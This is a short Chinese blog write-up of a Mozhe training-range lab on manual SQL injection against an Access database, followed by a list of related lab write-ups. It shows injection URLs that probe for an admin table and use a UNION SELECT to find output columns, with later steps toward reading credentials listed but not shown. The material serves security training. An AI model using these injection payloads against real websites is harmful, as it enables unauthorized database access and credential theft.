04#墨者靶場-SQL手工注入漏洞測試(Access數據庫)

原創 shy014 2020-02-23 21:05

                                                              墨者靶場4

                                                             By/shy014

  1. 確定列數,爲4列

  1. 確定存在admin表

http://219.153.49.228:47368/new_list.asp?id=1 and exists (select * from admin)

  1. 確定回顯位置

http://219.153.49.228:47368/new_list.asp?id=1 union select 1,2,3,4 from admin

  1. 確定存在username字段和passwd字段

 

  1. 讀取用戶和密碼

  1. 解密並提交key

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

Sqlilabs lesson1-6

注入步驟 判斷注入點 使用且或非來判斷,即and、or、xor 一般使用and來進行判斷,以第一關爲例: http://172.16.54.161/sqli/Less-1/?id=1’ and ‘1’=‘1 返回正確 http:/

qq_43558415 2020-07-02 23:19:39

hackthebox註冊教程

官方網址:https://www.hackthebox.eu/ hackthebox是一個靶場,聽說和vulnhub很像,最近迷上了做靶場,於是就像去hackthebox看看,發現還是註冊,而且註冊好像還沒有那麼簡單 在首頁的最下面有個j

shy014 2020-06-17 04:08:42

我愛做靶機之DC-3

下載地址:https://www.vulnhub.com/entry/dc-3,312/  主機發現 掃描端口,發現只開啓了80端口,通過-A參數,還可以看到該網站的CMS爲Joomla  訪問80端口 目錄掃描,發現網站後臺

shy014 2020-06-17 04:08:31

我愛做靶機之DC-4

下載地址:https://www.vulnhub.com/entry/dc-4,313/ 主機發現 arp -scan -l nmap -sP 端口掃描 掃描目錄 嘗試了弱口令和萬能密碼,也沒有什麼用 開始爆破 登錄成功,看樣

shy014 2020-06-17 04:08:31

我愛做靶機之DC-2

下載地址:https://www.vulnhub.com/entry/dc-2,311/ 主機發現 端口掃描 nmap -v -sV -A -p- 192.168.44.147 訪問80端口失敗,顯示無法訪問該網站 猜測是沒有做域

shy014 2020-06-08 17:10:46

我愛做靶機之DC-1

下載地址:https://www.vulnhub.com/entry/dc-1-1,292/ 主機發現 nmap -sn 192.168.44.0/24 (因爲DC靶機使用的是NAT模式,而我得NAT模式是192.168.44.0網段,

shy014 2020-06-08 17:10:46

OWASP Security Shepherd靶場實戰

風月长情 2020-05-08 19:01:56

搭建sql注入靶場

闲适的格调 2020-05-08 13:19:52

08#墨者靶場-Apache Struts2遠程代碼執行漏洞(S2-015)復現

shy014 2020-02-23 21:05:05

09#墨者靶場-Apache Struts2遠程代碼執行漏洞(S2-016)復現

shy014 2020-02-23 21:05:05

墨者靶場-SQL過濾字符後手工注入漏洞測試(第1題)

shy014 2020-02-23 21:05:05

07#墨者靶場-phpMyAdmin後臺文件包含分析溯源

shy014 2020-02-23 21:05:05

01#墨者靶場-X-Forwarded-For注入漏洞實戰

shy014 2020-02-23 21:05:05

03#墨者靶場-SQL手工注入漏洞測試(MySQL數據庫)

shy014 2020-02-23 21:05:05

DVWA靶場-常見漏洞原理以及防禦

R1ght0us 2020-02-21 05:25:15